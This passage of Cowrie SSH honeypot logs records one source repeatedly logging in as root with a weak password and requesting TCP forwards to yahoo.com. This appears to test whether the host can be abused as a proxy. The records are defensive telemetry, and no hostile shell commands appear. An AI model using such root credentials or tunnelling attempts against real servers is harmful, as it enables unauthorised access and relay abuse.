{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.992106Z","src_ip":"213.209.150.239","session":"29acc134cf48"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.049464Z","src_ip":"213.209.150.239","session":"29acc134cf48"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":13803,"dst_ip":"1.2.3.4","dst_port":22,"session":"985bf10c2500","protocol":"ssh","message":"New connection: 213.209.150.239:13803 (1.2.3.4:22) [session: 985bf10c2500]","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.105034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.105743Z","src_ip":"213.209.150.239","session":"985bf10c2500"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.162551Z","src_ip":"213.209.150.239","session":"985bf10c2500"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.444806Z","src_ip":"213.209.150.239","session":"985bf10c2500"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":4204,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:4204","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.502475Z","session":"985bf10c2500"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.559310Z","src_ip":"213.209.150.239","session":"985bf10c2500"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":20372,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:20372","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.715018Z","session":"985bf10c2500"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.772355Z","src_ip":"213.209.150.239","session":"985bf10c2500"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.829804Z","src_ip":"213.209.150.239","session":"985bf10c2500"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":14354,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a6bdf2468c8","protocol":"ssh","message":"New connection: 213.209.150.239:14354 (1.2.3.4:22) [session: 3a6bdf2468c8]","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.876066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.877030Z","src_ip":"213.209.150.239","session":"3a6bdf2468c8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:52.924155Z","src_ip":"213.209.150.239","session":"3a6bdf2468c8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.159014Z","src_ip":"213.209.150.239","session":"3a6bdf2468c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":16888,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:16888","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.207077Z","session":"3a6bdf2468c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.255120Z","src_ip":"213.209.150.239","session":"3a6bdf2468c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":32253,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:32253","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.389513Z","session":"3a6bdf2468c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.436756Z","src_ip":"213.209.150.239","session":"3a6bdf2468c8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.484687Z","src_ip":"213.209.150.239","session":"3a6bdf2468c8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":14928,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5ae6ef97ddf","protocol":"ssh","message":"New connection: 213.209.150.239:14928 (1.2.3.4:22) [session: d5ae6ef97ddf]","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.540530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.541548Z","src_ip":"213.209.150.239","session":"d5ae6ef97ddf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.598626Z","src_ip":"213.209.150.239","session":"d5ae6ef97ddf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.882432Z","src_ip":"213.209.150.239","session":"d5ae6ef97ddf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":5404,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:5404","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.940806Z","session":"d5ae6ef97ddf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:53.998084Z","src_ip":"213.209.150.239","session":"d5ae6ef97ddf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":19496,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19496","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.155242Z","session":"d5ae6ef97ddf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.212501Z","src_ip":"213.209.150.239","session":"d5ae6ef97ddf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.270144Z","src_ip":"213.209.150.239","session":"d5ae6ef97ddf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":15590,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4ad6e47ac89","protocol":"ssh","message":"New connection: 213.209.150.239:15590 (1.2.3.4:22) [session: b4ad6e47ac89]","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.316267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.317051Z","src_ip":"213.209.150.239","session":"b4ad6e47ac89"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.364925Z","src_ip":"213.209.150.239","session":"b4ad6e47ac89"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.600465Z","src_ip":"213.209.150.239","session":"b4ad6e47ac89"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":4808,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:4808","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.648570Z","session":"b4ad6e47ac89"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.695860Z","src_ip":"213.209.150.239","session":"b4ad6e47ac89"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":7074,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7074","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.833917Z","session":"b4ad6e47ac89"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.881637Z","src_ip":"213.209.150.239","session":"b4ad6e47ac89"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.929951Z","src_ip":"213.209.150.239","session":"b4ad6e47ac89"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16015,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f16411243e3","protocol":"ssh","message":"New connection: 213.209.150.239:16015 (1.2.3.4:22) [session: 2f16411243e3]","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.975835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:54.976593Z","src_ip":"213.209.150.239","session":"2f16411243e3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.023921Z","src_ip":"213.209.150.239","session":"2f16411243e3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.258804Z","src_ip":"213.209.150.239","session":"2f16411243e3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":17171,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17171","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.306727Z","session":"2f16411243e3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.353853Z","src_ip":"213.209.150.239","session":"2f16411243e3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":8290,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8290","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.489575Z","session":"2f16411243e3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.536760Z","src_ip":"213.209.150.239","session":"2f16411243e3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.584908Z","src_ip":"213.209.150.239","session":"2f16411243e3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16064,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0e9caa68b5a","protocol":"ssh","message":"New connection: 213.209.150.239:16064 (1.2.3.4:22) [session: a0e9caa68b5a]","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.640846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.641743Z","src_ip":"213.209.150.239","session":"a0e9caa68b5a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14